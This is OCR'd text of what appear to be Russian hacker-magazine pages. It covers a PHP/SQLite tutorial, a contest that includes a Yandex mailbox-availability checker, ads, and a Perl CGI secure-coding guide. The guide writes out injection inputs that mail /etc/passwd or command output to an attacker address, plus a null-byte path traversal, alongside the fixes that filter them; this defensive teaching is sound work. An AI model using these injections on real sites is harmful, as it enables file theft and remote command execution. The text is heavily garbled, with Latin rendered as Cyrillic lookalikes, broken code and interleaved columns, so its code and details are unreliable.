функций с туЗОІ_/../еІс на ЗцШе. Но такое 
сходство, как и следовало ожидать, чисто 
внешнее. Отличий куда больше - собственно, 
у этих СУБД принципиально разные движки. 
Например, в отличие от других БД, в ЗдШе 




отсутствует явная типизация данных. Вся ин- 
формация сохраняется в виде строк, оканчи- 
вающихся символом МІІІ_І_. Однако, следуя 
стандарту 30192, на этом этапе ЗцІЛе под- 
держивает типизацию данных в сгеаіе-запро- 
сах. В таком предложении каждому полю 
можно легко указать тип: РШАТ, ІІМТ или, к 
примеру, СНАВ. Однако реально информация 
о типе данных использоваться не будет: внут- 
ри базы ЗцШе различает только текстовый 
тип и строковый, что сказывается лишь на 
результатах сортировки. Сортировка из-за 
такого подхода несколько замедлена, ведь 
ЗцШе вынуждена каждый раз определять тип 
данных и применять либо строковую логику 
сравнения, либо логику, характерную для 
действительных чисел. 



КТО С 03 Д 0 П ЗОНТЕ? 



ВНИМПНИЕ! КОНКУРС 



Конкурс состоит из 3 этапов. 

На каждом этапе 3 задачи. 

За решение задач начисляются баллы. 
Победители определятся по сумме 
баллов за три этапа. 

1 место - бесплатный курс в УЦ 
«Специалист» на выбор; 

2 место - 50% скидка на обучение; 

3 место - 25% скидка на обучение. 

10 самых талантливых получат 
специальные подарки от журнала 
Хакер и Центра компьютерного 
обучения «Специалист» при МГТУ им. 
Н.Э. Баумана. 

О. Практическое задание 
(максимум 20 баллов) 

Требуется написать програм- 
му, проверяющую свобод- 
ность/занятость почтовых ящи- 
ков на Яндексе (вида 
абсІге55@уапсІех.ги). Необходи- 
мо максимизировать скорость 
проверки, т.е. параметр количе- 
ство ящиков/(время*скорость 
коннекта). Список ящиков бе- 
рется из файла ІізІ.М, где каж- 
дый адрес располагается на но- 
вой строке. Пример содержи- 
мого файла: 

асісігеззі 

а(Мге$$2 

асМгеззИ 



Ты сделал веб-форму для ан- 
кетирования пользователей. В 
форме есть поле, где пользова- 
тель должен ввести время в 
формате ч:мм:сс, например: 
3:08:15 или 14:20:01. Ты 
хочешь осуществить проверку 
вводимых в поле данных на 
ЗаѵаЗсгірЕ с использованием ре- 
гулярного выражения. 

Напиши это регулярное 
выражение. 

Примечание 

Пользователи, для которых создана 
форма, работают в Іпіегпеі Ехріогег 6. 

Ѳ. Вопрос 

(максисмум 5 баллов) 

Ты хочешь подключить к Ин- 
тернету свой компьютер 
ѴѴіпсІоѵѵз 2000 Рго, находящийся 
в локальной сети. Тебе извес- 
тен адрес локальной сети - 
192.168.93.0 (255.255.255.0), ІР 
адрес БМЗ сервера - 
197.146.81.130, №N8 сервера - 
1 92. 1 68.93. 1 00, а также ІР ад- 
рес компьютера, являющегося 
шлюзом в Интернет - 
197.146.82.223. 

Ты настроил параметры про- 
токола ТСР/ІР (см. ниже), одна- 
ко ожидаемого результата не 
добились. В чем твоя ошибка? 



П рограммист ІІіа 
АІзійапе1:зку (Илья 
Алшанецкий) занима- 
ется созданием ѵѵеЬ- 
приложений уже боль- 
ше 7 лет. В своей ра- 
боте он использует, 
главным образом, 

РНР, одновременно 
являясь его активным 
разработчиком, а так- 
же соавтором ряда до- 
полнительных продуктов, в том числе 5дІ_йе. Сейчас Илья рабо- 
тает в проекте под названием «АсІѵапсесІ Іпіегпеі: Оезідпз Іпс.», 
который занимается, в основном, разработкой и поддержкой 
орепзоигсе-форума РЮогипл. Также разработчик 5дІ_і1е был 
замечен мною в некоторых зесиге-рассылках, где писал о най- 
денных уязвимостях. 




Результаты работы програм- 
мы должны выводиться в файл 
гезиІШ. Пример результатов: 

ас!с1ге$$1 - занят 

асІ(Іге$з2 - свободен 

абсІгеззИ - занят 

Примечание 

Для проверки работы программ со- 
держимое файла Іізі.іхі будет сформи- 
ровано из произвольных адресов. Ог- 
раничений на язык программирования 
нет, можешь выбрать любой (С/С++, 
ОеІрГіі, РНР, РегІ, ...). Программы под 
ѴѴіпсІоѵѵз будут проверяться в ѴѴіпсІоѵѵз 
ХР, под - піх на Ресіога Соге 1 . 

О. Вопрос 

(максисмум 5 баллов) 



СПЕЦИАЛИСТ 



Шрнтц ісыпде -одосг р «ИС'учр-н 
ррн иг ту им Н Ш I ■гиана 



ПрчгГрііШьфМанін. 

С ѴіИ» С++ С* ѴБ ЫЕ1 

Імидит 

НЛ. Шій ■* От7к1«. 

&ЛМНННГ гімронлкжіп сгг**' 

ЯНДОЭСН» 

І5А ча-іг ІЧім-1 

Е-г^-м.іьо-ін.-ь сйіАй Реисніі ПК. 



НіЬ-ттяімдгмѵг 
1 щлі нТ-ни риРні. иіиК 
ЛвдЭЭТкС .І.нй ? АВР РНР РГ:Г. 

ЕЯ I я СнСІйЬДы г тЗДШ-Лймп* 

■ ЩчЗй-чІймн 

43 Р01М.1 200 3. ІТ-РгечосІ 

И.,і<-К|і>шгчіІ 

М&Ер а»іп 




МИсшла^Т 

1ЯШПЙІ 



С:\0оситепіз апб 5еШпдз\Ііи5ег>ірсопЛд /аІІ 

ѴѴіпсІоѵѵз 2000 ІР Сопіідигаііоп 

Нозі Мате : туііаск-сотр 

Ргітагу Міх : Иаск.сот 

Иосіе Туре : НуЬгісІ 

ІР Коиііпд ЕпаЫесІ : N 0 

ѴѴШ5 Ргоху ЕпаЫесІ :№ 

0И$ Міх Зеагсб Іізі. . . . : !іаек.сот 

ЕІІіегпеі асіаріег Ш іог СІаззгоот: 

Соппесііоп-зресіііс Міх . : 
Оезсгірііоп : ІпіеІ 8255х-Ьазеб 

РСІ ЕІІіегпеі Асіаріег (10/100) 

РііузісаІ Асісігезз. . . . : 00-00-В7-В8-73-Е6 

ОНСР ЕпаЫесІ : N 0 

ІР Асісігезз : 192.168.93.5 

ЗиЬпеі Мазк : 255.255.255.0 

БеТаиІі Оаіеѵѵау : 197.146.82.223 

0№ Зегѵегз : 197.146.81.130 

Ргітагу ѴѴШ8 Зегѵег .: 192.168.93.100 

Ответы 

Ответы присылай по адресу: 
зресіаІіз1@геаІ. хакер. ш с темой 
письма «Ответ на 1 задание 
конкурса». 

В письмо вложи архив .іір с 
файлами исходного кода и 
скомпилированную версию 
программы для задания 1 . От- 
веты на 2 и 3 вопросы напиши 
непосредственно в письме. 
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а На нашем диске 
ты найдешь доку- 
менты по §яШе, 
последнюю версию 
этого расширения 
и кучу готовых при- 
меров по работе с 
ним. 




А Посети офици- 
альный сайт проек- 
та - ѵѵѵга.Ішасі.сот 
/зѵѵ/зціііе. Там ты 
найдешь кучу доку- 
ментации, ссылку 
на СѴ$-сервер и 
сможешь слить 
последнюю версию 
системы. 




л В следующий 
раз мы проведем 
большое тестиро- 
вание производи- 
тельности всех 
рассмотренных к 
этому моменту 
схем хранения 
данных. Наконец- 
то станет ясно, где 
лучше всего хра- 
нить свои данные. 



В ЗцШе реализована целая куча дополни- 
тельных фишек, расширяющих функцио- 
нальность по сравнению с той же туЗОБ. 
Прежде всего нужно отметить возможность 
выполнения вложенных запросов, что позво- 
ляет в одном сеансе использовать сведения, 
выбираемые другими предложениями. 
Структура такого запроса рекурсивна, то 
есть представляет собой классическое де- 
рево. Его обработка является очень простой 
классической рекурсивной задачей. Поэтому 
мне непонятно, почему разработчики туЗОІ_ 
до сих пор не решаются включить поддерж- 
ку вложенных запросов в эту СУБД, но это 
уже их проблемы. Создатель Зціііе в первую 
же версию своего продукта включил исполь- 
зование вложенных запросов, тем самым 
снизив количество используемых РНР-функ- 
ций и увеличив в конечном итоге произво- 
дительность сценариев. Это имеет значи- 
мую роль во время выполнения большого 
количества запросов к базе. 

А практика 

Впрочем, довольно голословной теории. Да- 
вай разберемся, каким же образом осущес- 
твляется работа с ЗцШе. Вот основные 
функции при процедурном подходе: 

5дМ1е_ореп("Л1е"). Эта функция откры- 
вает для работы файл, содержащий все таб- 
лицы твоей базы данных. Функция возвраща- 
ет указатель на открытую базу данных, и вся 
дальнейшая работа с базой идет через него. 
В одном сценарии ты можешь открыть столь- 
ко БД, сколько тебе потребуется, и без проб- 
лем оперировать потоками информации. 

здІіІе_диегу($сІЬ, "диегу"). Эта функция 
отправляет запрос "циегу" БД, доступной по 
идентификатору $сІЬ. Функция возвращает 
указатель на строку с результатами запроса. 

5дІіІе_іеІсН_аггау($ге5иІЦ. Функция по- 
мещает в двухмерный ассоциативный массив 
результат запроса. Если результат содержит 
несколько записей, каждая из них доступна в 
рамках цикла ѵѵМІе, например так: 

иііііе (Згоѵѵ = $діііе Теісіі_аггау($ге$иіі)) { 
ргіпЩ"$г(ш[ісІ1] | $гоѵѵ[і(12]\п"); 

} 



Функция здІііе_сІозе($сІЬ) закрывает со- 
единение с базой данных. Эту процедуру не- 
обходимо вызывать в конце каждого сцена- 




рия, чтобы освободить неиспользуемую па- 
мять и уничтожить указатели. 

Давай напишем простенький сценарий, на 
примере которого ты быстро поймешь, как 
работать с этой СУБД. Всмотрись в этот код: 



Пример простого сценария 



<?ріір 

$№ = $дІіІе_ореп("ІіІе.с1Ь"); 

5діііе_диегу($(і[), "СВЕАТЕ ТАВИ Ыаіі (И ШТЕ6ЕВ РВІМАВѴ КЕѴ, 
пате СНАВ(255))"); 

$дІііе_диегу($(1Ь, "ІШТ ШТО Ыаіі (пате) ѴАШЕ8 СдогГ)"); 
$дІііе_диегу($с11), "ІШТ ШТО ЬІаіі (пате) ѴАШЕ$ ('сиі- 
іаіі')");; 

$ге$ = $діііе_диегу($(11), "ЗЕЕЕСТ * ГРОМ Ыаіі"): 
ѵѵііііе ($ге = $діііе_Геісіі_аггау($ге$)) { 
есііо "$г[пате] ііа$ $г[і(1]<Ьг>\п"; 

} 

$дііІе_сіо$е($сІЬ); 

?> 



Внимательный читатель сразу отметит 
сходство в синтаксисе работы с гпу501_. В 
самом деле, незначительно отличаются 
лишь названия функций. В любом сценарии 
можно просто заменить тузці на зціііе, и 
тем самым, фактически, будет осуществлен 
переход на новую технологию! А сейчас я 
расскажу тебе о дополнительных фишках, 
которые мне удалось разведать. 

А ДОПОПНИТЕПЬНЫЕ ФИШКИ 

Помимо кучи внутренних особенностей, ко- 
торые нас не особенно волнуют, ЗцШе пре- 
доставляет программистам кучу дополни- 
тельных удобных функций. Они несколько 
упрощают сценарии и ускоряют процесс 
извлечения информации из базы. Так, нап- 
ример, одним вызовом функции стало воз- 
можно и выполнить запрос, и извлечь дан- 
ные, сводя на нет весь лишний геморрой. 
Хотя, конечно, это все очень призрачно. Но 
факт остается фактом - сами по себе сцена- 
рии упрощаются: вместо громоздкой 
конструкции применяется всего один вызов 
функции. Более того, если запрос заведомо 
возвращает только один столбец, при помо- 
щи 5дІИ:е_5іпдІе циегу() можно сразу полу- 
чить результат - строку или массив с инте- 
ресующей информацией. Впрочем, не сле- 
дует этим злоупотреблять: если результат 
выборки содержит большое количество дан- 
ных, объем занятой памяти убьет весь выиг- 
рыш производительности. 

Получать результаты запросов можно и 
другим способом: 



Получение результата запроса 



<?ріір 

$сІІ) = пеѵѵ здІіІе.ЫіС'Іііе.Ы)"): 

$ге$ = $(1Ь->ипЬиТТеге(]_диегу("ЗЕЕЕСТ * ЕРОМ Ыаіі"); 

Тогеасіі ($ге$ а$ $г) { 
есііо "$г[0] $г[1]\п"; 

} 

?> 

В принципе, такой метод абсолютно ана- 
логичен классическому. Принципиальных от- 
личий нет, однако, в рассматриваемом слу- 
чае значительно повышена производитель- 
ность. За счет чего? Давай подумаем. Оче- 
видно, что любой прирост производитель- 
ности достигается лишь тогда, когда обраба- 



тывается меньшее количество информации. 

В данном случае ты как программист лиша- 
ешься инструмента - внутри цикла у тебя нет 
доступа к ключам, поскольку данные не про- 
хэшированы в памяти. Такая схема получе- 
ния информации сильно экономит ресурсы и 
работает значительно быстрее, чем 
здІіТе_ТеТсІі_*(), поэтому я советую тебе ее 
использовать. 

Также расширение ЗцШе предоставляет 
чрезвычайно интересную возможность соз- 
дания своих собственных функций, исполь- 
зуемых в пределах зці-запроса. Довольно 
странно, не так ли? Как это стало возмож- 
ным? Напомню тебе, что ЗцШе в одной- 
единственной библиотеке, из которой пар- 
сер РНР импортирует некоторые функции, 
содержит как интерфейс, так и сам движок 
БД. За счет этого достигается возможность 
расширения стандартного АРІ. Для этого да- 
же есть специальная функция 
здІіІе_сгеаІе_Типсйоп(), при помощи которой 
можно легко создавать собственные проце- 
дуры, которые в дальнейшем будут исполь- 
зованы внутри какого-то зці-запроса. Давай 
рассмотрим простейший пример: 



Создаем собственную зді-срункцию 



<? 

Гипсііоп и$ег_Т($с!Ь$1г, $$іг) { 
геіигп $(Мг."-".$$іг; 

} 

$сііз = пеѵѵ $діііе_сІЬ("Іііе.сІЬ"); 

$сИ)->сгеаіе_Гипсііоп( , и$ег_Г , 1 'изегТ', 2); 

$г = $(іЬ->аггау_диегу("$ЕЕЕСТ пате, и$ег_Г(пате, 'пацан!') 

ЕРОМ Ыаіі", 80ИТЕ.А880С); 

ргіпі_г($г); 

?> 



Здесь мы описали элементарную, мараз- 
матичную по сути функцию изег Т, которую 
использовали при выполнении запроса. Эта 
возможность, несмотря на нелепость приме- 
ра, позволяет заметно упростить даже такой 
элементарный скрипт. 

Кстати, при таком подходе можно исполь- 
зовать сам парсер РНР в качестве движка 
шаблонов. Он будет вставлять в НТМЬкод 
данные из таблицы, что вообще может свести 
на нет необходимость использования допол- 
нительного движка шаблонов. Само собой, 
это еще и довольно производительное реше- 
нием пользовательском пространстве не со- 
вершается никаких действий сданными. 

А ВЕШТ8 

Приятель, мы только что разобрались с но- 
вым инструментом, поздравляю! Ты уже по- 
нял, что ЗцШе - офигительно функциональ- 
ное решение и эта БД может легко поспо- 
рить с туЗОЦ по крайней мере, для исполь- 
зования в небольших некоммерческих про- 
ектах. В любом случае, этот продукт достоин 
самого пристального внимания со стороны 
любого ѵѵеЬ-разработчика. Разумеется, как и 
любой инструмент, ЗцШе имеет свои силь- 
ные и слабые стороны. Для небольших сис- 
тем, рассчитанных, прежде всего, на получе- 
ние данных из таблиц, это своего рода пана- 
цея от всех бед, идеальное решение. Удачи 
в экспериментах! □С 

■ 1111111111111111 
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І^ПГН 

МУЗЫКАЛЬНЫЕ НАГРАДЫ 
МТѴ РОССИЯ 





1 К ОКТЯБРЯ 

I V КРЕМЛЬ:МОСКВА 



ПОМОГИ КУМИРУ! 




полный список номинантов 
и асе подробности ищи на сайте 
тт.Мѵ.ги и в эфире МТѴ 

1 с'--ц|| 1 *:-:гь и^ілвіи | р №>уѵгя [Ш 1 1 '^гшт* іл*іи 



ГОЛОСУЙ! 



■ по телефону (095) 727-2034* 

• с помощью ЗМЗ-сообщений с 
кодом номинанта на номер 4343 

• на сайте ѵѵѵѵѵѵ.тіѵти 









ОСНОВЫ БЕ30ППСН0Г0 КОДИНГП НО РЕНІ 



огда непросвещенному человеку нужен скрипт гостевухи, он пибо ищет его в инете, пибо пишет сам. Топько пара-тройка пюдей из 
десяти задумывается над вопросом безопасности сценария. И они правипьно депают, потому что ошибки есть практически в пюбом 
коде, и их необходимо своевременно исправпять. Мечтаешь научиться этому? Тогда слушай сюда! 



А ДОВЕРЯЙ, НО ПРОВЕРЯЙ! 




Е сли в сишном коде програм- 
миста заботит переполнение 
буфера, то ѵѵеЬ-разработчика 
в первую очередь должны вол- 
новать параметры, передавае- 
мые ССІІ-сценарию. В идеаль- 
ном случае скрипт стойко вы- 
держивает любой запрос, од- 
нако подобные сценарии я встречал очень 
редко. Все потому что умные программисты 
никогда не показывают свои исходники, а 
свободно распространяемые скрипты, как 
правило, всегда дырявые. 

Возьми себе за правило: скачал скрипт 
из инета - просмотри его с ног до головы. 

В первую очередь, выкинь все ненужные 
функции (в сценариях часто встречаются 
комментарии к коду) и перепиши непонят- 
ные. Дело в том, что «умелые» программис- 
ты любят извращать код собственными ал- 
горитмами даже в тех случаях, когда проце- 
дуру можно написать при помощи простого 
и надежного модуля. 



А правильный зеиомріі 

Типичная ситуация: ты скачал фриварный 
скрипт гостевухи и не знаешь, насколько он 
безопасен. Руководствуясь моим советом, 



ты открываешь сорцы скрипта, анализиру- 
ешь их и видишь небольшой кусочек кода 
подобного содержания: 



Благодарственное письмо 



ІІ$е С6І ди(:$ІаікІаг(1); 

$етаіІ=рагат('етаіГ); 
ореп(МАИ І "|/и$г/$Ьіп/$еп(1таіІ -I $етаіГ); 
ргіпі МАИ "Ргот: а(1тіп@Іатег.ги\п": 
ргіпі МАИ "ЗиЬіесі: ТІіапк$\п\пТГіапк уои!\п"; 
сІозе(МАН); 

На первый взгляд код не представляет 
ничего опасного. Но только на первый. Пом- 
нишь, что я говорил про входные парамет- 



ры? Тебя должно насторожить, что перемен- 
ная $етаіІ не проверяется на спецсимволы. 

К тому же, в коде используется вызов внеш- 
него бинарника зепсітаіі, который запускает- 
ся для приема данных через ЗТОІІМ -поток. 

Его ключик -Т отвечает за то, что адрес полу- 
чателя можно указать прямо в командной 
строке, как и сделано в коде гостевухи. А что 
если злобный хакер введет свой е-таіі в ви- 
де хакер@хакер.ш|саТ /еТс/раззѵѵсІ|таіІ 
хакер@хакер.ш? 

В этом случае хакеру в ящик свалятся це- 
лых два письма. Первое с благодарностью, 
второе с файлом /еТс/раззѵѵсІ :). 

Поразительно, но многие программисты 
до сих пор юзают зепсітаіі с ключом -I и не 
проверяют входные 
данные, подвергая 
свой сайт взлому. 
Чтобы пофиксить 
баг, тебе придется 
отказаться от этой 
опции, а адрес зада- 
вать уже после отк- 
рытия потока. А еще 
обязательно прове- 
рить переменную 
$етаіІ на подозри- 
тельные символы. 
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ЖЕЛЕЗНЫЙ СКРИПТ 




сііе ргіпі "Іпсоггесі а(1(Іге$$!\п" іі ($етаіІ=~/[\|;]/ 1| 
$етаіІ~!Д@/); 

ореп(МАI^,"|/и$г/$Ьіп/$епсIтаіI ,, ); 
ргіпі МАИ "То: $етаіІ\п"; 



Л ПРЕДОТЕПЬСКИЙ БОЙТ 

Следующая, более коварная ошибка встре- 
чается гораздо чаще, чем кривой вызов 
зепсітаіі. Баг основан на так называемой об- 
работке нуль-байта. В сишных функциях по- 
добный байтик является признаком конца 
строки. Соответственно, как только он встре- 
чается, функция не обрабатывает дальней- 
шие чары в строке. Однако РегІ так не счита- 
ет :). Перловая строка может содержать лю- 



бые байты, даже нулевой. В результате по- 
добной рассинхронизации взломщик может 
хакнуть твой скрипт. Непонятно? Рассмот- 
рим на примере. Допустим, в той же госте- 
вухе ты встречаешь следующий код: 



Нулевой баг 



$пит=рагат('пит'); 

$дие$і(1іг="/тпі/Шѵѵе[)"; 

ореп(МЕ$8_РИЕ,"$диез1:(]іг/$пит.Ш"): 

Переменная пит берется из потока и, по- 
видимому, содержит номер страницы, на ко- 
торой юзер оставляет сообщение. Казалось 
бы, проверка на спецсимволы здесь неуме- 



ОШИБКО С НОМЕРОМ 500 



М еня часто спрашивают, по какой причине браузер выдает 
ошибку 500 при подаче запроса к сценарию. Так как моя за- 
дача - научить тебя кодить без ошибок, я просто обязан упомя- 
нуть про этот коварный баг. Ошибка 500 может появиться в 
следующих случаях: 

О. Не оформлен хидер. 

Основное отличие кон- 
сольного приложения от 
ССІ-скрипта в том, что во 
втором случае браузеру 
обязательно пересылает- 
ся тип данных. Поэтому 
убедись, что в твоем коде 
перед первым операто- 
ром ргіпі: встречается 

строка ргіпі: «СопіепМуре: 
іюхі/іііплі \п\п»; 

О. Неверный путь к интерпретатору. Удостоверься, что первая 
строчка в скрипте оформлена в виде правильного пути к РегІ. 
На сервере интерпретатор может лежать в /изг/ІосаІ/Ьіп, а в 
сценарии указываться в виде /изг/Ьіп. Данная проблема акту- 
альна, в основном, дляѴѴіпсІоѵѵз-кодеров, где РегІ может нахо- 
диться в любой папке. 

Ѳ. Присутствие синтаксических ошибок в коде. Прежде чем 
проверять скрипт через браузер, запусти его в консоли с клю- 
чиком -с. И только после положительного ответа интерпрета- 
тора, продолжай тестирование из ѵѵеЬ'а. 

О. Присутствие символа «\г». Символ перевода каретки означа- 
ет, что скрипт был залит в бинарном режиме. Переключи режим 
передачи в А5СІІ, либо набери консольную команду Іуре азсіі, и 
только потом закачивай сценарий на удаленный сервер. 

V 




стна - к значению переменной автоматичес- 
ки прикрепляется расширение Іхі, что не 
позволит, например, прочитать /еіс/раззѵѵсі. 
Но если хакер пошлет запрос вида 
ѵѵѵѵѵѵ.Іатег.ги/сді-Ьіп/Ьоок.сді?пит= 

../../../еіс/ра$$ѵѵс1%00, системный файл будет отк- 
рыт и отображен вместо страницы с госте- 
выми записями. Это происходит потому, что 
сишная функция обработала строку до появ- 
ления нуль-байта, остальные же символы (в 
нашем случае .1x1) просто игнорировались. 

Пофиксить уязвимость можно с помощью 
элементарной проверки $пит на спецсимво- 
лы. Если в переменной могут встречаться 
буквы, фикс выглядит следующим образом: 

(Ііе ргіпі "іпсоггесі пшпЬег" іі ($пит=~Д0/); 

Если достаточно, чтобы переменная при- 
нимала только числовое значение, можно 
обойтись регулярным выражением вида 
$пит!~Д0/. 

А ПТПКН ЧЕРЕЗ ППЙПЫ 

Символ «|», или пайп, как его еще называют, 
открывает аргумент функции не для чтения, 
а для исполнения. Это ты знаешь сам либо 
понял из описания первого бага. На наличие 
пайпов нужно проверять все входные пере- 
менные, в противном случае хакер может 
использовать твою гостевуху (или другой 
скрипт) как ѵѵеЬ-шелл. Рассмотрим следую- 
щий бажный блок кода: 




А Чтобы обход 
ТаіпІ-сИеск в суид- 
ных сценариях за- 
работал, опцию -Ц 
необходимо ука- 
зать не только в 
консоли, но и в 
первой строке 
скрипта. 



л Не стоит забы- 
вать, что данная 
статья предостав- 
лена лишь для оз- 
накомления и орга- 
низации правиль- 
ной защиты с твоей 
стороны. За при- 
менение материа- 
ла в незаконных 
целях автор и ре- 
дакция ответствен- 
ности не несут. 



Опасная переменная 



$те$$аде=рагат('те$$аде'); 
ореп(МЕ55,">$те$$аде"); 
ргіпі МЕ5$ "Ме$$: $те$$аде\п"; 
сІо$е(МЕ$$); 
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Этот код безопасен в том случае, если в 
переменной $теззаде отсутствует символ 
«|». Когда хакер осуществит запрос 
ѵѵѵѵѵѵ.Іатег.ги/сді-Ьіп/Ьоок.сді?тез$аде=|іс1;ипате -а|таіІ 
хакер@хакер.ги, команды успешно выполнятся, 
а их результат злоумышленник получит по 
мылу. Кстати, мою первую гостевуху хакну- 
ли именно через такую дырку. Наступать 
второй раз на грабли я не собираюсь, поэ- 
тому всегда проверяю входные параметры 
на наличие пайпов. 

(Ііе ргіпі "6о іо /сіеѵ/пиіі" іі ($те$$аде=~А|/); 

Л ПРОВЕРКО НО ВШИВОСТЬ 

Как ты понял, входные параметры сценария 
представляют особую опасность. Поэтому 
обязательно проверяй их на наличие спец- 
символов. Из вышеописанных ошибок следу- 
ет, что проверку необходимо делать следую- 
щим образом: 

$іприі=~$/[\о\|Ѵ\\\Мд; 

Подобная строка кода удалит из перемен- 
ной все запрещенные символы. Эта 
конструкция часто юзается в моих скриптах 
и гарантирует их безопасную работу. Если 
ты не уверен в абсолютной безопасности 
своего скрипта, очисть принимаемую пере- 
менную от двойных точек: 

$іприі=~$Л.\.//д; 

Этот шаг приведет изменение запроса 
?те55аде= . ./. ./. ./. ./еіс/раззѵѵсі к виду ?тез- 
заде=////еіс/раззѵѵсІ, что обломает замыслы 
хакера. Впрочем, скрипт принадлежит тебе, 
поэтому только извращенная фантазия - путь 
к абсолютной безопасности. 

Необходимо отметить, что передавать 
данные следует только методом Р08Т, а 
СЕТ применять лишь на стадии отладки. 

Я могу привести как минимум две причи- 
ны, следуя которым необходимо отка- 
заться от СЕТ. 

Во-первых, хакер, который видит все 
признаки СЕГ-запроса, пытается изменить 
значение переменных прямо через брау- 
зер. В итоге, если твой скрипт действи- 
тельно небезопасен, злоумышленник может 
совершить какую-нибудь пакость. Когда 
данные передаются РОЗТ'ом, взломщику 
нужно заглянуть в НТМЬкод, узнать пере- 
менные, которые получает скрипт, а лишь 
затем подставить их в поток. Впрочем, ты 
можешь усложнить миссию хакера, если 
заюзаешь следующую конструкцию: 

сііе ВДУ{ШЕ$Т_МЕШ} пе 'Р08Г); 




защищайся регвыромі 



С амый популярный способ изоляции входных переменных от 
посторонних символов - регулярные выражения. Если чест- 
но, научиться регвырам довольно сложно. Даже я, несмотря на 
большой опыт в программировании, до сих пор не освоил эту 
прекрасную возможность языка. Но азы регулярных выражений 
я знаю, поэтому привожу несколько простых шаблонов, кото- 
рые позволят усилить безопасность твоего скрипта. 

~5/[\&\;\\\ДЛ>\<\'\ I \п\г\1]//д ; - конструкция для удаления из 
переменной посторонних символов. Как ты понял, чары просто 
перечисляются в [] (естественно, если символы являются спе- 
циальными, их надо экранировать). 

\і ($іп=~/[\;\|]/) { сііе ргіпі "Ѵои аге Іатег\п" } - можно также 
припугнуть взломщика, сказав ему, что ты следишь за своим ко- 
дом :). 

$іп=~5Д0//д; - удаление из переменной всех нечисловых сим- 
волов. Бывает полезным при анализе номера страницы, сооб- 
щения еіс. 

$іп=~5ДѴѴ//д; - то же самое, только переменная должна при- 
нимать буквенное значение (пробелы не в счет). 

$т=~5ДО//д; - уже известное тебе удаление нуль-байта. 



При таком раскладе хакер должен сохра- 
нить НТМІ_- документ к себе на винт, затем 
немного его пропатчить, а лишь потом скор- 
мить переменные скрипту. Поверь, не каждый 
взломщик пойдет на такие извращения :). 

Во-вторых, если ты юзаешь СЕТ, любой 
локальный юзер в системе может узнать па- 
роли, передаваемые сценарию (если, конеч- 
но, таковые имеются). Это делается при по- 
мощи команды дгер раззѵѵогсі ассезз іод с 
последующим варьированием шаблона. 

Уф, кажется, я убедил тебя отказаться 
от (ЗЕТ. Раз я заговорил о паролях, про- 
должим эту тему. Некоторые администра- 
торы любят делать дефолтные пароли в 
своих сценариях либо писать их чистым 
текстом. Когда ты занялся изготовлением 
фриварного скрипта, забудь о значениях 
по умолчанию. Лучше наколбась какой-ни- 



будь іпзіаІІ.сді, который запросит пароль у 
пользователя. Если же ты юзер, выбрав- 
ший творение с дефолтным паролем, - не- 
медленно поменяй его на сложную фразу, 
иначе тебя легко поломают. 

Никогда не пиши пароль чистым текстом. 
Если хакер имеет доступ к РТР либо 88Н, то 
он сможет его подсмотреть, а затем исполь- 
зовать в корыстных целях. Лучше зашифруй 
пассворд функцией сгурЦ), а затем сравни- 
вай пришедший извне пароль с эталонным. 
Это делается следующим образом: 

$ра$5="ШѵиЬ42Шд40е"; 

$ра$$2=рагат('ра$$'); 

сііе ргіпі "Еггог\п" іі (сгурі(Зра$$2,$иЬзіг($ра$$,2)) пе Зразз); 

Подобный код прост и безопасен одновре- 
менно. Даже если взломщик посмотрит исход- 
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Все параметры как на ладони 



ник, ему придется расшифровать хэш, прежде 
чем приступить к деструктивным действиям. 

А С9ИДНЫЕ СКРИПТЫ 

Порой приходится писать суидные сценарии 
(скрипты, запускаемые из под рута), которые 
обрабатываются специальным интерпретато- 
ром /изг/Ьіп/зиісІрегІ. Он создан специально 
для работы с подобным кодом. Когда созда- 
ешь такие вещи, нужно обращать особое 
внимание на безопасность, в противном слу- 
чае взломщик может порутать сервер за нес- 
колько минут. По умолчанию компилятор за- 
пускается с опцией -Т, которая отвечает за 
так называемую Іаіпі-проверку. Подобная 
вещь анализирует внешние данные. Если в 
сценарии используются переменные окруже- 




Доверяй только РОЗТ’у! 



ния либо небезопасные параметры, скрипт 
немедленно завершает работу. Некоторые 
«продвинутые» программисты забивают на 
такую проверку, блокируя ее флажком -II. В 
итоге вся безопасность сводится на нет. Ни- 
когда не отказывайся от Таіпі-проверки, ес- 
ли она действительно необходима. 

Кроме этого, всегда используй опцию 
компилятора -ѵѵ, которая выдает в ЗТОЕНН 
так называемые предупреждения. Это не 
ошибки, однако код со множественными 
варнингами, как правило, небезопасен. 

А юзать ипи не юзпть? 

Наконец, мы подошли к основному вопросу: 
чей код лучше использовать? Я не сторонник 
фриварных скриптов, но и не могу заставить 
отказаться от них. Решай сам: если сцена- 
рий заслуживает доверия и ты знаешь его 
код как свои 20 пальцев, - смело используй 
его в работе. Если же скрипт выглядит убо- 
го, а в исходнике нет ни одной проверки на 
спецсимволы - лучше напиши свой проект. 
Пусть он будет не слишком функциональ- 
ным, зато тебя не сломает ни один хакер. ЗС 
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а Описание: Любой админ должен знать, когда и кто обращается к его машине. Для этого написано уже немало ути- 
лит мониторинга ІР-обращений. Если тебя что-то в них не устраивает, то я предлагаю исходник такой утилиты, который 
можно улучшить по своему усмотрению. 



а Особые отличия 

О Отличный пример слежения за об- 
ращениями к твоему компу. 

О Код написан неплохо, и легко мож- 
но расширить его функции. Я бы до- 
бавил возможность сигнализации 
при обращении к локальной машине 
с определенного ІР. 

О Отслеживаются как входящие, так 
и исходящие обращения. 

О Медленная работа. После того как 
произошло множество обращений по се- 



л Диагноз 

Подобные утилиты не только контро- 
лируют обращения к компу с нежела- 
тельных хостов, но и выслеживают 
адреса, по которым обращаются 
троянцы. 

а Ссылки 

Забираем файл здесь: 
Шр://(1аіа.ргодІіЬ.ги/с/пеі$/іртоп.2ір 



ти, программа поодиночке прорисовыва- 
ет каждый пункт в списке. 




^ I | ь 



^ ИМЕНОВЯННЫЕ КЯНЯПЫ 



а Описание: В ѴѴіпсІоѵѵз 9х была отличная возможность обмена сообщениями через программу ѴѴіпрорир и ее 
именованные каналы. В КІТ-системах все эту возможность позабыли, позабросили, потому что появилась команда МЕТ 



БЕШ. А ведь иногда нужно, чтобы программы обменивались данными по каналам. 



а Особые отличия 

О Можно обмениваться данными 
даже при ненастроенном протоколе 
ТСР/ІР, правда, обмен идет с не- 
большими задержками, но это при- 
емлемо. 

О В данном примере в одном моду- 
ле показывается, как реализовать 
сервер и клиент. 

О Все реализовано через класс, ко- 
торый легко подключается к проекту 
и упрощает работу с каналом. 



О Можно указывать имя канала и таким 
образом устанавливать несколько неза- 
висимых связей. 



а Диагноз 

Иногда нет смысла заморачиваться с 
